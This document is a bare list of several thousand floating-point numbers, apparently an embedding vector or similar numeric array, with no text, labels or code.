-0.01002309750765562, -0.030444970354437828, 0.0004813378327526152, -0.015462919138371944, 0.008745791390538216, 0.01767190732061863, -0.022059829905629158, -0.0007311638910323381, -0.04907861351966858, 0.008888548240065575, 0.055750660598278046, -0.025546124204993248, -0.014117990620434284, 0.009256713092327118, 0.012314734980463982, -0.0069838594645261765, -0.007660080678761005, 0.007554890587925911, -0.01988089643418789, -0.021894531324505806, 0.005992068909108639, -0.06329428404569626, -0.005221928469836712, -0.02363767847418785, 0.003833797061815858, -0.01006066519767046, -0.0063827745616436005, 0.0279504656791687, -0.018753860145807266, -0.02850646898150444, 0.04733546823263168, -0.030354807153344154, -0.00126415747217834, 0.004812438972294331, 0.02360762469470501, 0.027664950117468834, 0.0008269618847407401, 0.033871155232191086, 0.024133574217557907, -0.00802448857575655, 0.000536280800588429, -0.013554473407566547, 0.031106162816286087, -0.036365658044815063, 0.03423180803656578, 0.037387505173683167, 0.011991651728749275, -0.016514819115400314, -0.010654237121343613, 0.017716988921165466, -0.00028551550349220634, -0.026357589289546013, 0.025801585987210274, 0.019249755889177322, 0.0064654238522052765, -0.008047029376029968, -0.017957422882318497, 0.025486016646027565, -0.04414971545338631, -0.010316126048564911, -0.015553081408143044, 0.009346876293420792, 0.013344093225896358, 0.02539585344493389, 0.002855155151337385, 0.01567329838871956, -0.0282960906624794, -0.0027649924159049988, 0.019941003993153572, -0.03892027214169502, 0.005248225759714842, -0.0077840546146035194, -0.027319326996803284, 0.01701071299612522, 0.0019929734990000725, -0.03834924101829529, -0.016229303553700447, -0.012622791342437267, -0.013554473407566547, -0.05118241161108017, -0.001858668401837349, 0.04303770512342453, 0.024268819019198418, -0.0026391400024294853, 0.030189508572220802, -0.01209684181958437, -0.012765549123287201, -0.04234645888209343, 0.04183553531765938, 0.0004893210134468973, 0.016920551657676697, 0.005082927644252777, -0.014080422930419445, -0.02360762469470501, 0.020827604457736015, -0.013689717277884483, -0.0034919297322630882, 0.015245025977492332, 0.021969666704535484, -0.007137887645512819, -0.0003388148616068065, -0.006123556289821863, -0.03095589205622673, 0.01749158278107643, -0.010999861173331738, 0.02819089964032173, 0.011112564243376255, -0.017897315323352814, -0.03260887786746025, 0.016124112531542778, 0.031136218458414078, -0.017266174778342247, -0.020091276615858078, 0.02012133039534092, 0.03206789866089821, -0.05376707762479782, -0.029077500104904175, -0.0018248573178425431, 0.04393933340907097, -0.005732851102948189, -0.007979406975209713, 0.0007893940201029181, -0.03633560612797737, -0.03585473820567131, 0.02888214774429798, 0.031526923179626465, -0.006348963361233473, 0.02874690480530262, 0.003612146945670247, 0.003888270352035761, 0.015928760170936584, -0.019024349749088287, -0.03146681562066078, -0.014335883781313896, 0.018167803063988686, -0.006713371258229017, 0.00644663954153657, 0.043849170207977295, -0.04754584655165672, -0.020887713879346848, -0.003937108442187309, -0.01732628419995308, 0.018212884664535522, 0.00436538178473711, 0.04273716360330582, -0.011991651728749275, 0.00840016733855009, -0.026688186451792717, -0.033149853348731995, 0.009271740913391113, 0.015350215137004852, 0.0018859050469473004, 0.02595185674726963, -0.03973173722624779, 0.0014238207368180156, 0.015034645795822144, -0.041565049439668655, 0.002423125086352229, 0.01257770974189043, 0.010376234538853168, -0.02784527651965618, 0.02661305107176304, -0.006499234586954117, -0.009151523932814598, 0.026312507688999176, -0.01284068450331688, 0.0033416585065424442, -0.02142869122326374, 0.017281202599406242, -0.015162376686930656, -0.00009438917186344042, 0.0008058299426920712, 0.008685681968927383, -0.04027271270751953, -0.028205927461385727, 0.07495533674955368, 0.025050228461623192, 0.05208403989672661, 0.008648114278912544, -0.034772783517837524, 0.00710031995549798, 0.05229441821575165, 0.027649924159049988, -0.035944901406764984, 0.051753442734479904, 0.01284068450331688, 0.03185752034187317, 0.024419089779257774, 0.012209544889628887, -0.005995825864374638, 0.0786820650100708, -0.007648810278624296, -0.006735912058502436, 0.04583275318145752, -0.010947265662252903, -0.025440935045480728, 0.053135938942432404, -0.048267148435115814, -0.010451370850205421, -0.06128064543008804, -0.03390121087431908, -0.03702685236930847, -0.013351607136428356, 0.014290803112089634, 0.0025001391768455505, 0.00983525812625885, -0.009467093273997307, -0.035283707082271576, 0.00114769721403718, 0.006750938948243856, 0.00891860295087099, 0.025621259585022926, 0.006796020548790693, -0.0081973010674119, -0.0036647417582571507, -0.0004411872068885714, -0.007911785505712032, -0.008107137866318226, -0.003354807151481509, 0.008422707207500935, -0.014583831652998924, 0.004057325888425112, -0.015898706391453743, 0.012307221069931984, -0.0021526366472244263, 0.0036572283133864403, -0.004042298533022404, 0.01684541441500187, -0.04748573899269104, -0.007528593298047781, 0.010947265662252903, 0.011615972965955734, -0.012765549123287201, 0.007438430562615395, -0.02166912518441677, -0.0035689438227564096, -0.02816084586083889, -0.0009053847170434892, -0.01812272146344185, 0.019475163891911507, 0.0293329618871212, 0.011878947727382183, -0.018167803063988686, -0.021864477545022964, 0.0060221231542527676, 0.003758661448955536, 0.016274383291602135, 0.036395713686943054, 0.012968415394425392, -0.012878252193331718, -0.007979406975209713, -0.03068540431559086, 0.026117155328392982, 0.008873521350324154, -0.041504938155412674, -0.049198832362890244, 0.026823431253433228, -0.014779184944927692, 0.02861166000366211, -0.02398330345749855, -0.004267705604434013, -0.00020568387117236853, 0.013314039446413517, -0.0028870878741145134, 0.0016736468533053994, 0.009121469222009182, 0.029873939231038094, -0.03768804669380188, -0.006882426328957081, 0.0017525393050163984, -0.003159454558044672, -0.0007546438137069345, -0.012690412811934948, 0.0006635417812503874, -0.025005148723721504, -0.03558424860239029, -0.006240016780793667, 0.027274245396256447, 0.018693752586841583, -0.010849589481949806, 0.016379574313759804, -0.01988089643418789, -0.005796716082841158, 0.04333825036883354, 0.03925086930394173, -0.013238903135061264, -0.011916515417397022, 0.04532182961702347, 0.010631696321070194, 0.022931404411792755, -0.02353248931467533, -0.013892583549022675, 0.020346736535429955, -0.02222512848675251, -0.030985945835709572, 0.0174314733594656, -0.0006123556522652507, 0.003865729784592986, 0.021458745002746582, -0.00987282581627369, 0.029212744906544685, -0.010759426280856133, 0.013937665149569511, 0.014591345563530922, -0.022901348769664764, -0.008257409557700157, 0.020557116717100143, -0.022736050188541412, 0.014065396040678024, -0.014936969615519047, 0.008813412860035896, 0.029738694429397583, -0.0010115138720721006, -0.010932238772511482, 0.0042226240038871765, -0.0037567829713225365, -0.031767357140779495, 0.004782384727150202, -0.018618617206811905, -0.013855015859007835, 0.01513232197612524, 0.04928899183869362, 0.025591205805540085, -0.013614581897854805, -0.03158703073859215, 0.009895366616547108, -0.006082231644541025, 0.010721858590841293, -0.011413106694817543, -0.015868650749325752, -0.01420063991099596, 0.011014888063073158, 0.003790594171732664, 0.011848893947899342, 0.020527062937617302, 0.029453178867697716, -0.0169055238366127, 0.024629469960927963, -0.01597384177148342, 0.008107137866318226, 0.005146792624145746, 0.016710171476006508, -0.0041550020687282085, 0.05698288604617119, -0.017311256378889084, 0.017025740817189217, -0.016454709693789482, 0.010045638307929039, -0.025891749188303947, -0.01080450788140297, 0.019174620509147644, 0.0025583691895008087, 0.004865034017711878, -0.009654932655394077, -0.008204814046621323, 0.022525671869516373, 0.0009636148461140692, -0.019941003993153572, 0.004643383901566267, -0.014673994854092598, -0.020241547375917435, 0.003820648416876793, 0.011112564243376255, 0.003944622352719307, -0.01725114695727825, 0.007814108394086361, 0.022420480847358704, 0.004361625295132399, 0.0013036037562415004, 0.009842772036790848, -0.0009711284074001014, 0.011826353147625923, -0.02142869122326374, 0.0026297480799257755, -0.014673994854092598, -0.051513008773326874, 0.013501877896487713, -0.026282453909516335, 0.007562404498457909, -0.007280645426362753, 0.02150382660329342, -0.016094058752059937, 0.02270599640905857, -0.013283984735608101, -0.010609155520796776, 0.004684708546847105, -0.021233337000012398, 0.0010650480398908257, -0.00034938083263114095, -0.008099623955786228, -0.0022634617052972317, -0.001317691639997065, 0.009083901531994343, -0.009391957893967628, 0.003525740932673216, -0.008820926770567894, -0.00854292418807745, -0.008753304369747639, -0.009271740913391113, 0.014463614672422409, 0.0060221231542527676, -0.04586280882358551, 0.013990259729325771, 0.027664950117468834, -0.031016001477837563, 0.0010960414074361324, -0.017025740817189217, -0.010564073920249939, -0.011570891365408897, -0.03913065046072006, 0.005300820805132389, 0.033660776913166046, -0.02698872983455658, 0.01711590401828289, -0.002535828622058034, 0.008745791390538216, -0.0039483788423240185, -0.005180603824555874, 0.0184683445841074, 0.003694796236231923, -0.03330012410879135, 0.00886600837111473, 0.007239320781081915, -0.02453930675983429, 0.02033171057701111, -0.021578961983323097, 0.024524278938770294, 0.007235564291477203, -0.02871684916317463, -0.045502156019210815, -0.0017262417823076248, 0.020076248794794083, -0.02640267089009285, 0.017236120998859406, -0.007494782097637653, -0.006224989425390959, -0.000284811103483662, -0.02360762469470501, -0.010256017558276653, -0.026958676055073738, 0.020992903038859367, 0.009542228654026985, 0.035524141043424606, -0.02502017468214035, 0.004019757732748985, -0.017160985618829727, -0.02440406195819378, -0.006882426328957081, 0.00640155840665102, 0.02326199971139431, 0.04219618812203407, -0.01615416631102562, 0.025561152026057243, -0.022615833207964897, 0.0038807569071650505, 0.00843773502856493, -0.01142062060534954, 0.03534381464123726, -0.00918157771229744, -0.007611242588609457, -0.007866703905165195, -0.03543397784233093, -0.03402142599225044, -0.029002364724874496, -0.011195213533937931, 0.030520105734467506, -0.031286489218473434, 0.014959510415792465, -0.030520105734467506, 0.03675636649131775, 0.0069838594645261765, -0.01325393095612526, 0.011390565894544125, -0.013404201716184616, 0.025350771844387054, 0.013652149587869644, -0.016439681872725487, -0.005995825864374638, 0.08264922350645065, -0.013419228605926037, 0.024629469960927963, -0.007295672781765461, -0.0035107138101011515, 0.009632391855120659, -0.02278113178908825, 0.0007579309749417007, 0.010759426280856133, -0.00988785270601511, -0.020436899736523628, -0.03543397784233093, 0.012089327909052372, -0.00919660460203886, -0.02922777272760868, 0.0013994016917422414, -0.021233337000012398, 0.010736886411905289, -0.013855015859007835, 0.020902741700410843, -0.00707402266561985, -0.014951996505260468, 0.021804368123412132, 0.020692361518740654, -0.01998608559370041, -0.0035351328551769257, 0.016454709693789482, 0.0074234032072126865, -0.016725197434425354, 0.01870878040790558, 0.024374008178710938, -0.008618060499429703, -0.016274383291602135, -0.0028081953059881926, 0.03327007219195366, -0.005188117269426584, -0.013005983084440231, 0.013652149587869644, -0.020692361518740654, -0.010549047030508518, -0.007814108394086361, -0.03471267595887184, -0.01490691490471363, 0.0027499652933329344, 0.019024349749088287, 0.015380269847810268, -0.031256433576345444, 0.01396020594984293, -0.011728676967322826, -0.004421733785420656, -0.0362454429268837, 0.004947683308273554, -0.02688353881239891, -0.0320979543030262, -0.021488798782229424, 0.00047241547144949436, 0.0019403784535825253, -0.03792848065495491, 0.04565242677927017, -0.0022427993826568127, 0.027394462376832962, 0.009857798926532269, 0.015492972917854786, 0.011240295134484768, -0.016064004972577095, -0.007904271595180035, -0.006551829632371664, -0.038259077817201614, 0.015958813950419426, 0.00011023809929611161, 0.010639209300279617, -0.02267594262957573, 0.009136496111750603, -0.02954334206879139, 0.010496451519429684, -0.0066570197232067585, -0.002409976441413164, 0.005668985657393932, -0.03345039486885071, -0.022495616227388382, 0.02267594262957573, -0.013885070569813251, -0.002148879924789071, 0.008227354846894741, 0.0053496588952839375, 0.0044555445201694965, -0.015019618906080723, 0.01911451295018196, -0.014741616323590279, 0.025621259585022926, -0.023622652515769005, -0.01278808992356062, 0.008881035260856152, -0.05001029744744301, 0.008069570176303387, 0.0020850144792348146, -0.028807012364268303, -0.03699680045247078, 0.0160489771515131, -0.016695143654942513, 0.008159732446074486, -0.013464310206472874, 0.016304438933730125, 0.0376279391348362, -0.004865034017711878, -0.044750798493623734, -0.002443787408992648, 0.024253791198134422, -0.013652149587869644, -0.023246973752975464, 0.02097787708044052, -0.022375399246811867, -0.01621427573263645, -0.022871294990181923, 0.016785306856036186, 0.007562404498457909, 0.029137609526515007, 0.010105746798217297, 0.028431333601474762, -0.02547098882496357, 0.007329483516514301, -0.009083901531994343, -0.026522887870669365, 0.033630721271038055, -0.024118546396493912, 0.028311116620898247, -0.006747182458639145, 0.030700430274009705, -0.04562237486243248, 0.0016332614468410611, 0.005184360779821873, 0.01735633797943592, -0.001617295085452497, -0.014275775291025639, -0.01607903093099594, 0.0070665087550878525, 0.011285376735031605, 0.0000698526855558157, 0.012810629792511463, -0.02733435295522213, 0.0011909002205356956, -0.005101711489260197, 0.0174314733594656, 0.004057325888425112, -0.0021394880022853613, -0.010729372501373291, -0.010699317790567875, -0.06990621984004974, -0.022210100665688515, 0.011150131933391094, -0.003063656622543931, -0.013629608787596226, 0.0035125920549035072, -0.0019610407762229443, 0.003180116880685091, -0.013764852657914162, 0.007246834691613913, 0.006033393554389477, 0.021098094061017036, -0.009700014255940914, -0.020797550678253174, -0.01929483748972416, -0.027499651536345482, 0.05310588702559471, -0.003758661448955536, 0.007077779155224562, -0.008355085738003254, 0.020512035116553307, -0.023517461493611336, 0.02230026386678219, -0.03281925618648529, -0.012081813998520374, 0.00205308198928833, 0.005458605941385031, -0.05148295313119888, 0.01470404863357544, -0.0004050281713716686, -0.0243289265781641, -0.029768748208880424, 0.038289133459329605, 0.014020314440131187, -0.0006250347942113876, -0.053376372903585434, -0.0003296577197033912, -0.015102268196642399, 0.008137191645801067, -0.003567065577954054, -0.012217058800160885, 0.01783720590174198, -0.012036733329296112, 0.018378183245658875, 0.011969110928475857, -0.0005677438457496464, -0.017341310158371925, 0.03949130326509476, 0.028927229344844818, -0.021413663402199745, -0.00779156805947423, 0.010406289249658585, 0.02664310485124588, 0.003557673655450344, -0.01946013607084751, 0.012675385922193527, 0.011285376735031605, 0.005920690018683672, -0.002684221602976322, -0.012472519651055336, -0.013223876245319843, -0.0314067080616951, -0.003420551074668765, 0.0012716710334643722, 0.0014040976529940963, -0.01118018664419651, 0.034772783517837524, -0.044330038130283356, 0.010917211882770061, -0.005608877167105675, -0.00803951546549797, 0.00275184353813529, 0.021699178963899612, 0.02470460534095764, -0.02909252792596817, -0.008069570176303387, -0.019790733233094215, -0.025771532207727432, -0.026763321831822395, 0.014921942725777626, 0.04544204846024513, -0.030985945835709572, 0.026237372308969498, -0.034742727875709534, -0.021443717181682587, 0.00479741208255291, 0.002086892956867814, -0.015958813950419426, 0.0030786837451159954, 0.018272992223501205, -0.003955892752856016, 0.0019554055761545897, -0.01209684181958437, 0.010669264011085033, -0.000906323897652328, -0.011368025094270706, -0.026387644931674004, -0.0017685056664049625, -0.020211493596434593, -0.0232920553535223, 0.015477946028113365, 0.016409628093242645, 0.009204118512570858, -0.013629608787596226, 0.014155558310449123, 0.00685988599434495, 0.0170858483761549, -0.00847530271857977, -0.01516988966614008, -0.0017929247114807367, -0.018242938444018364, 0.03260887786746025, 0.023998329415917397, 0.055480170994997025, -0.011202727444469929, 0.009865311905741692, -0.007055238354951143, -0.009008766151964664, -0.033841103315353394, 0.01746152713894844, 0.0188139695674181, -0.0069725895300507545, -0.027394462376832962, 0.0020155140664428473, -0.027033811435103416, -0.03510338068008423, 0.009136496111750603, -0.009489634074270725, 0.030895784497261047, 0.004421733785420656, 0.0003707475261762738, 0.03302963823080063, 0.004312786739319563, -0.01777709648013115, 0.002806316828355193, 0.00964741874486208, -0.009286767803132534, 0.014982051216065884, 0.01597384177148342, -0.029287880286574364, -0.03861973062157631, 0.014163072220981121, -0.014230694621801376, -0.0012650967109948397, 0.009309308603405952, -0.03375094011425972, 0.012329761870205402, 0.0006752817425876856, 0.0028157089836895466, -0.005161819979548454, -0.015477946028113365, -0.030625294893980026, 0.003180116880685091, -0.024945039302110672, -0.03324001654982567, -0.010436343029141426, -0.014914428815245628, 0.004680951591581106, 0.07243077456951141, 0.00642785569652915, 0.010458883829414845, -0.020617226138710976, -0.012607763521373272, 0.006311395671218634, -0.0025959371123462915, -0.007438430562615395, -0.005762905348092318, 0.015883678570389748, 0.010639209300279617, 0.003721093526110053, -0.026598023250699043, 0.029347989708185196, 0.014914428815245628, -0.008926116861402988, -0.009136496111750603, -0.021894531324505806, 0.029513288289308548, -0.013216362334787846, -0.020692361518740654, 0.001642653369344771, 0.01444107387214899, -0.030384860932826996, 0.027394462376832962, 0.004410463385283947, 0.012104354798793793, 0.0017844719113782048, -0.011112564243376255, 0.009038819931447506, -0.015365242958068848, -0.03444218635559082, -0.006645749323070049, -0.01169862225651741, 0.0009664324461482465, -0.005451092030853033, -0.012036733329296112, 0.013441769406199455, -0.009391957893967628, 0.016454709693789482, -0.006882426328957081, 0.00286079035140574, 0.003388618351891637, -0.022510644048452377, 0.018318073824048042, -0.014095449820160866, 0.045472100377082825, -0.004282732494175434, 0.02015138417482376, 0.0010509600397199392, 0.0014726589433848858, -0.02802560105919838, 0.0072581046260893345, 0.012525114230811596, 0.0018605467630550265, 0.0064240992069244385, 0.030204536393284798, 0.010346180759370327, -0.005804229993373156, -0.00912898313254118, -0.006371504161506891, -0.016379574313759804, 0.008565464988350868, 0.0257114227861166, 0.030354807153344154, -0.0001381791807943955, -0.02568136900663376, 0.023322109133005142, -0.011691109277307987, 0.02474968694150448, -0.020782524719834328, 0.02802560105919838, 0.010376234538853168, 0.002642896957695484, 0.026237372308969498, 0.018753860145807266, 0.020767496898770332, 0.038529567420482635, -0.017145957797765732, -0.007821622304618359, 0.035494085401296616, -0.003604633267968893, -0.01471907552331686, 0.01684541441500187, -0.011105050332844257, 0.01695060543715954, -0.016815360635519028, -0.020106302574276924, -0.024238763377070427, 0.006811047438532114, -0.0008161611040122807, 0.0046884650364518166, 0.010729372501373291, -0.013186308555305004, 0.011931543238461018, 0.005845554638653994, 0.004891331307590008, -0.020451927557587624, -0.025651315227150917, -0.021128147840499878, -0.0293329618871212, -0.014133017510175705, 0.01140559371560812, -0.029903993010520935, -0.007690134923905134, -0.001862425240688026, 0.0019403784535825253, 0.014140531420707703, -0.0246745515614748, -0.00849032960832119, 0.005180603824555874, -0.0005545950843952596, -0.001280123833566904, -0.008092110976576805, -0.025455961003899574, 0.024930011481046677, 0.017311256378889084, 0.005372199695557356, -0.016995687037706375, -0.023442326113581657, -0.01953527145087719, -0.03810880705714226, 0.016484763473272324, -0.01256268285214901, -0.005958257708698511, 0.008520384319126606, -0.006668290123343468, -0.0009758243686519563, 0.014035341329872608, 0.0025959371123462915, 0.031767357140779495, 0.0022221370600163937, 0.02416362799704075, -0.019595380872488022, 0.01663503609597683, 0.009098928421735764, 0.01884402334690094, -0.012712953612208366, 0.008648114278912544, 0.017626825720071793, -0.007370808161795139, 0.022856267169117928, 0.020872686058282852, 0.030279671773314476, 0.008986225351691246, -0.0050491164438426495, -0.019174620509147644, 0.0027424516156315804, 0.024178655818104744, 0.044810909777879715, 0.0030279671773314476, -0.035253651440143585, 0.01299095619469881, 0.005079170688986778, 0.002507652621716261, 0.018453318625688553, 0.022210100665688515, -0.0011533324141055346, -0.008362598717212677, 0.000467719481093809, -0.025050228461623192, -0.0003378756809979677, 0.01663503609597683, -0.013712258078157902, -0.0054060108959674835, 0.027935437858104706, 0.03023459017276764, -0.022856267169117928, -0.021173229441046715, -0.02701878361403942, 0.004320300649851561, -0.015214971266686916, -0.008888548240065575, -0.011984137818217278, 0.01873883418738842, 0.000290915893856436, -0.011525810696184635, 0.006596911232918501, 0.010654237121343613, -0.023442326113581657, -0.0037642966490238905, 0.004842493217438459, -0.021473772823810577, -0.002857033396139741, 0.015477946028113365, -0.028581606224179268, 0.009279253892600536, -0.005992068909108639, -0.0284764152020216, 0.02139863558113575, 0.013569500297307968, 0.027244189754128456, -0.01532016135752201, -0.013704744167625904, 0.02584666758775711, -0.02360762469470501, -0.008009461686015129, -0.014726589433848858, -0.004019757732748985, -0.03720717877149582, 0.0008466849685646594, 0.011638513766229153, 0.01118018664419651, 0.011773757636547089, -0.024028385058045387, -0.011781271547079086, -0.020061220973730087, 0.014561290852725506, -0.0018051342340186238, -0.01173618994653225, 0.017551690340042114, 0.008858494460582733, -0.031286489218473434, 0.015523027628660202, -0.023081675171852112, 0.011961597017943859, 0.004027271643280983, -0.0219095591455698, 0.011706136167049408, 0.02201474830508232, -0.009249200113117695, 0.0024043412413448095, 0.007633782923221588, 0.016755253076553345, -0.02560623362660408, 0.027169054374098778, 0.021684151142835617, -0.021037984639406204, -0.02757478691637516, 0.006645749323070049, -0.01214943639934063, -0.008723250590264797, -0.002220258815214038, -0.011608459986746311, -0.0030955893453210592, -0.024043411016464233, 0.014486155472695827, -0.010654237121343613, 0.013930151239037514, -0.031016001477837563, 0.007310699671506882, 0.004290246404707432, 0.002507652621716261, 0.0061310697346925735, -0.0034919297322630882, -0.0003317708906251937, -0.0013806177303195, 0.018408237025141716, -0.006270071025937796, 0.017446501180529594, 0.009790176525712013, 0.01302852388471365, 0.004282732494175434, -0.011330457404255867, -0.02198469452559948, 0.005218171514570713, 0.021098094061017036, -0.022029776126146317, 0.02922777272760868, -0.009895366616547108, -0.0032270767260342836, -0.014020314440131187, -0.012585223652422428, 0.011863920837640762, -0.006326422560960054, 0.0279504656791687, 0.007536106742918491, 0.008738277480006218, -0.015898706391453743, -0.005034089088439941, -0.010398775339126587, 0.015139835886657238, -0.010624182410538197, -0.001596632762812078, -0.012156950309872627, 0.006559343077242374, 0.019024349749088287, -0.021143175661563873, -0.005834284238517284, 0.005620147567242384, -0.00840016733855009, 0.04009239003062248, -0.01437345240265131, -0.01642465591430664, 0.010609155520796776, -0.009805203415453434, -0.03907054290175438, -0.024103520438075066, -0.0010631695622578263, -0.01698065921664238, 0.006157367490231991, 0.025861695408821106, 0.009391957893967628, 0.010503965429961681, 0.009091414511203766, 0.006476693786680698, -0.01350939180701971, 0.012141922488808632, -0.012262139469385147, 0.010564073920249939, -0.005267009604722261, 0.014155558310449123, 0.014636427164077759, 0.009497147984802723, -0.030865728855133057, 0.018318073824048042, 0.008415194228291512, 0.001047203317284584, -0.012014192529022694, -0.038499511778354645, -0.005883122328668833, 0.022450534626841545, -0.009797690436244011, -0.03164714202284813, -0.019956031814217567, -0.0070402114652097225, -0.007769027259200811, 0.01173618994653225, -0.01583859696984291, 0.008257409557700157, 0.0037755670491605997, -0.007344510871917009, 0.0045381938107311726, 0.00891860295087099, -0.007442187052220106, 0.017626825720071793, 0.009121469222009182, 0.005578822921961546, -0.0027048836927860975, 0.008790872059762478, 0.004530680365860462, 0.0243289265781641, 0.01024850457906723, -0.00036769514554180205, -0.007637539878487587, -0.007472241297364235, 0.02746959775686264, 0.02201474830508232, -0.008279949426651001, 0.003285306738689542, -0.01732628419995308, 0.04195575416088104, -0.005075413733720779, 0.029182691127061844, 0.015853624790906906, -0.01791234128177166, 0.0024588145315647125, 0.013479338027536869, 0.0008419890073128045, 0.004327814094722271, 0.00036886913585476577, -0.0008382322266697884, -0.017581744119524956, 0.02509531006217003, -0.010924724861979485, 0.02999415621161461, -0.004628356546163559, 0.01349436491727829, 0.02456936053931713, 0.004958953708410263, -0.011360512115061283, 0.00034703282290138304, -0.03414164483547211, -0.007047724910080433, 0.005274523515254259, 0.024554334580898285, 0.018242938444018364, 0.006630721967667341, 0.026973702013492584, -0.013930151239037514, 0.0091440100222826, 0.005575065966695547, 0.011383052915334702, -0.011383052915334702, 0.0075323497876524925, -0.011202727444469929, 0.010263531468808651, -0.0055976067669689655, 0.010977320373058319, 0.033390287309885025, 0.0027556002605706453, 0.0033228746615350246, -0.006720884703099728, -0.004913872107863426, -0.00985028501600027, -0.0019065673695877194, 0.0041812993586063385, 0.008234868757426739, -0.010195909067988396, -0.00955725647509098, 0.003914568107575178, -0.014794211834669113, 0.003580214222893119, 0.013299011625349522, 0.0092341722920537, -0.014178099110722542, 0.00919660460203886, -0.006495478097349405, -0.017957422882318497, -0.02033171057701111, -0.0066833170130848885, 0.005868094973266125, -0.010383748449385166, 0.022736050188541412, 0.0001769210066413507, 0.0032946986611932516, 0.004267705604434013, -0.0009251078008674085, 0.02512536570429802, 0.003001669654622674, 0.004647140856832266, 0.03058021329343319, -0.01663503609597683, -0.012472519651055336, -0.012412411160767078, 0.019550299271941185, 0.015553081408143044, -0.010556560009717941, 0.02160901576280594, -0.007776540704071522, 0.0067659663036465645, -0.01680033467710018, 0.009669959545135498, 0.004049811977893114, 0.006059690844267607, -0.006525532342493534, -0.01308111846446991, -0.0009556316654197872, -0.009016279131174088, 0.017341310158371925, -0.005879365373402834, 0.01054153311997652, -0.007182969246059656, -0.0006302003748714924, 0.009677473455667496, -0.007408376317471266, -0.008618060499429703, -0.006596911232918501, 0.0027574787382036448, -0.014801724813878536, -0.010135800577700138, -0.005984555464237928, -0.002875817473977804, -0.004842493217438459, -0.01011325977742672, -0.012059273198246956, -0.013637122698128223, 0.022240156307816505, -0.031136218458414078, -0.015177403576672077, 0.0123372757807374, -0.0021563933696597815, -0.0013918881304562092, 0.021939612925052643, -0.006067204754799604, 0.009061360731720924, 0.004628356546163559, -0.0036478363908827305, -0.015553081408143044, 0.0016811604145914316, 0.004023514688014984, -0.019820787012577057, 0.0053083342500030994, -0.005312091205269098, 0.027003755792975426, -0.008993738330900669, -0.026838457211852074, 0.005650201812386513, 0.008422707207500935, -0.011337971314787865, 0.020181437954306602, 0.0017938639502972364, 0.017416445538401604, -0.01570335403084755, 0.012592736631631851, -0.006732155103236437, 0.00802448857575655, 0.008888548240065575, -0.022630861029028893, -0.014756644144654274, 0.018318073824048042, 0.006942535284906626, -0.020542088896036148, 0.014230694621801376, -0.02563628740608692, 0.03263892978429794, -0.002336719073355198, -0.009752608835697174, 0.009294281713664532, 0.008174760267138481, 0.0026785864029079676, 0.005838040728121996, 0.0020305411890149117, 0.0009814596269279718, 0.016589954495429993, -0.010827048681676388, 0.02916766330599785, 0.0393410325050354, 0.0023310838732868433, -0.008219840936362743, -0.02108306623995304, 0.007228050380945206, 0.0043879225850105286, 0.004658410791307688, -0.021473772823810577, 0.0021526366472244263, 0.0029133851639926434, 0.0031031027901917696, -0.0038431889843195677, -0.012758035212755203, 0.00783664919435978, -0.0037530262488871813, -0.009241686202585697, 0.00007560526137240231, 0.015477946028113365, 0.01142062060534954, 0.0031200083903968334, 0.012833170592784882, -0.025320718064904213, -0.009534715674817562, 0.010631696321070194, -0.0017966815503314137, -0.010068178176879883, -0.02312675677239895, -0.015778489410877228, -0.004395436029881239, 0.0033961317967623472, 0.01002309750765562, -0.020166411995887756, -0.004703492391854525, 0.012269653379917145, 0.010669264011085033, -0.005052873399108648, -0.007994433864951134, 0.0010293585946783423, 0.015297620557248592, 0.0036065117456018925, -0.007667594123631716, 0.008054543286561966, 0.006563100032508373, 0.005481146275997162, -0.032458607107400894, 0.010654237121343613, -0.006799777504056692, 0.01631946489214897, 0.001014331472106278, 0.01729622855782509, 0.009917907416820526, -0.012179490178823471, -0.00030946501647122204, 0.005774175748229027, 0.02118825726211071, -0.002011757344007492, -0.012945874594151974, 0.004380409140139818, 0.020557116717100143, -0.0018859050469473004, 0.025876721367239952, 0.006687073968350887, 0.012344788759946823, 0.0031237651128321886, 0.015087240375578403, 0.02698872983455658, -0.012367329560220242, -0.003138792235404253, 0.0009171246783807874, 0.007303186226636171, 0.01173618994653225, -0.0003613555745687336, -0.008392653428018093, 0.01591373234987259, 0.0006494538974948227, 0.008272436447441578, -0.0014735981822013855, 0.00025334805832244456, -0.011773757636547089, 0.0009636148461140692, -0.02895728312432766, -0.006585640832781792, 0.02281118743121624, -0.00945957936346531, 0.0073820785619318485, -0.03164714202284813, -0.01507972739636898, -0.004395436029881239, -0.032458607107400894, -0.0028739389963448048, 0.00503033259883523, 0.0001505061227362603, 0.009572283364832401, 0.016349520534276962, -0.002855155151337385, -0.017446501180529594, -0.012525114230811596, -0.011578405275940895, -0.02909252792596817, -0.0014200640143826604, -0.01354695949703455, -0.021113120019435883, 0.008227354846894741, -0.006375260651111603, 0.011676081456243992, -0.01684541441500187, -0.008129678666591644, 0.00666077621281147, -0.010090718977153301, 0.02136858180165291, 0.00026673160027712584, -0.01652984507381916, -0.002642896957695484, 0.010962292551994324, -0.016199247911572456, -0.005161819979548454, 0.009309308603405952, 0.013163767755031586, -0.0034149158746004105, 0.006638235878199339, -0.008234868757426739, -0.029257826507091522, -0.026312507688999176, 0.02012133039534092, 0.005792959593236446, 0.004733546636998653, 0.008618060499429703, -0.00391832459717989, 0.016544872894883156, 0.002034297911450267, -0.03420175239443779, -0.00126415747217834, 0.0015703353565186262, 0.0071228607557713985, -0.006093502044677734, 0.006540559232234955, 0.00013782698079012334, 0.007547377143055201, 0.023802977055311203, 0.006352720316499472, 0.013231390155851841, 0.01660498045384884, 0.012945874594151974, -0.01666508987545967, -0.006146097090095282, 0.0063827745616436005, -0.01722109317779541, -0.003940865397453308, -0.013855015859007835, 0.030835675075650215, -0.017281202599406242, 0.01615416631102562, 0.02126339264214039, 0.009489634074270725, 0.0066419923678040504, -0.004188813269138336, 0.004215110559016466, -0.000040473467379342765, -0.02616223692893982, -0.0007527653942815959, -0.021729232743382454, -0.0038807569071650505, -0.003978433087468147, -0.002693613525480032, -0.003354807151481509, -0.013201335445046425, 0.013208849355578423, -0.015380269847810268, 0.014989564195275307, -0.00940698478370905, 0.039190761744976044, -0.005548768676817417, 0.001680221175774932, 0.010090718977153301, 0.039461247622966766, -0.018648670986294746, 0.008640601299703121, -0.015508000738918781, -0.002261583460494876, 0.006059690844267607, 0.003131278557702899, -0.013577014207839966, -0.018648670986294746, -0.0020061221439391375, 0.008415194228291512, 0.009497147984802723, -0.0012153192656114697, -0.003538889577612281, -0.009429525583982468, 0.006142340134829283, 0.0005574126844294369, -0.009294281713664532, -0.0029115069191902876, 0.010564073920249939, -0.006104772444814444, 0.00867816898971796, 0.009294281713664532, -0.005744121503084898, -0.024494225159287453, 0.01169862225651741, 